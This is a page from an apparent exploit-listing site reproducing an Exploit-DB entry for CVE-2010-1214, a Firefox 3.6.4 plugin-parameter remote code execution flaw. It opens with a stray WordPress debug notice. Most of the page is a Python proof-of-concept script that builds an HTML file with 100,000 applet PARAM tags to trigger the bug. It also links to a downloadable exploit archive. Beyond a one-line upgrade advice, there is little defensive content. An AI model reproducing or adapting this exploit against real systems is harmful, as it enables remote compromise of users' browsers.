Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Firefox Plugin Parameter EnsureCachedAttrParamArrays Remote Code Execution - exploit.company
header-logo
Suggest Exploit
vendor:
Firefox
by:
Unknown
9
CVSS
CRITICAL
Remote Code Execution
CWE
Product Name: Firefox
Affected Version From: Firefox 3.6.4
Affected Version To:
Patch Exists: YES
Related CWE: CVE-2010-1214
CPE: a:mozilla:firefox:3.6.4
Metasploit: https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2010-1214/https://www.rapid7.com/db/vulnerabilities/suse-sa-2010-032/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0546/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0547/https://www.rapid7.com/db/vulnerabilities/suse-cve-2010-2755/https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2010-2755/https://www.rapid7.com/db/vulnerabilities/mfsa2010-48-cve-2010-2755/https://www.rapid7.com/db/vulnerabilities/mozilla-seamonkey-cve-2010-1214/https://www.rapid7.com/db/vulnerabilities/ubuntu-USN-930-6/https://www.rapid7.com/db/vulnerabilities/ubuntu-USN-957-2/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2010-1214/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2010-2755/https://www.rapid7.com/db/vulnerabilities/suse-cve-2010-1214/https://www.rapid7.com/db/vulnerabilities/freebsd-vid-c2eac2b5-9a7d-11df-8e32-000f20797ede/https://www.rapid7.com/db/vulnerabilities/mfsa2010-37-cve-2010-1214/https://www.rapid7.com/db/vulnerabilities/mfsa2010-48-dangling-pointer-crash-regression-from-plugin-parameter-array-fix/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0544/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0545/
Other Scripts:
Platforms Tested:
2010

Firefox Plugin Parameter EnsureCachedAttrParamArrays Remote Code Execution

This exploit allows remote attackers to execute arbitrary code on a system with Firefox 3.6.4 by exploiting a vulnerability in the Firefox plugin parameter EnsureCachedAttrParamArrays.

Mitigation:

Upgrade to a version of Firefox that is not affected by this vulnerability.
Source

Exploit-DB raw data:

'''
  __  __  ____         _    _ ____  
 |  \/  |/ __ \   /\  | |  | |  _ \ 
 | \  / | |  | | /  \ | |  | | |_) |
 | |\/| | |  | |/ /\ \| |  | |  _ < 
 | |  | | |__| / ____ \ |__| | |_) |
 |_|  |_|\____/_/    \_\____/|____/ 

http://www.exploit-db.com/moaub-17-firefox-plugin-parameter-ensurecachedattrparamarrays-remote-code-execution/
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/34358.zip (moaub-17-exploit.zip)
'''
'''
  Title              :  Firefox Plugin Parameter EnsureCachedAttrParamArrays Remote Code Execution
  Version            :  Firefox 3.6.4
  Analysis           :  http://www.abysssec.com
  Vendor             :  http://www.mozilla.com
  Impact             :  Critical
  Contact            :  shahin [at] abysssec.com , info  [at] abysssec.com
  Twitter            :  @abysssec
  CVE                :  CVE-2010-1214
  
'''

import sys;

myStyle = """
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>page demonstration</title>
<link rel="stylesheet" type="text/css" href="style2.css" />


</head>
<body id='msg'>


    <applet code = 'appletComponentArch.DynamicTreeApplet'   archive = 'DynamicTreeDemo.jar', width = 300, height = 300 >

"""
i=0
while(i<100000):
    myStyle = myStyle + "<PARAM name='snd' value='Hello.au|Welcome.au'>\n";
    i=i+1

myStyle = myStyle + """
	</applet>

</body>
</html>
"""
cssFile = open("Abysssec.html","w")
cssFile.write(myStyle)
cssFile.close()

Navigation

Suggest Exploit

Services By CQR